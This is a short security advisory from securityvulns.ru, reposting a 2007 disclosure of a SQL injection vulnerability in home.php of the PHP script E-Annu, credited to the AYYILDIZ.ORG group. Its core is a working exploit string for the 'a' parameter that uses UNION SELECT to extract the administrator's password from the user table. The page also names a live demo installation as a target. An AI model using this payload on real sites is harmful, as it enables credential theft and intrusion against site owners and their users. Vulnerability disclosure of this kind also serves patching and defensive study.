Computer Security

Security Advisory: E-Annu (home.php) Remote SQL Injection Vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_81$2007] wordpress plugins wordTube <= 1.43 (wpPATH) Remote File Inclusion Vulnerability

  [ECHO_ADV_82$2007] wordpress plugins wp-Table <= 1.43 (inc_dir) Remote File Inclusion Vulnerability

  Sendcard  (sendcard.
php) Sendcard Local File Inclusion Vulnerability

  Wordpress plugin myflash <= V1.00  (wppath) RFI Vulnerability

From:ilkerKandemir_(at)_mynet.com <ilkerKandemir_(at)_mynet.com>
Date:02.05.2007
Subject:E-Annu (home.php) Remote SQL Injection Vulnerability

-------------------------------------------------AYYILDIZ.ORG PreSents...


Script: E-Annu

Script D.: http://www.alic.ch/sources/annu.rar
Script Demo: http://www.autocash.ch/annu/



Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>



info:  */ Siz Yokken AYYILDIZ Vardi. */

-------------------------------------------------Exploit:



home.php?a='/**/UNION/**/SELECT/**/0,password,1,2,3,4,
6/**/FROM/**/user/**/WHERE/**/user_id=1/*



-------------------------------------------------

Reklam yeri: Turkistiklal.com

-------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Gencnesil,X-Hacker,Ajann
Special Tnx: AYYILDIZ.ORG
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server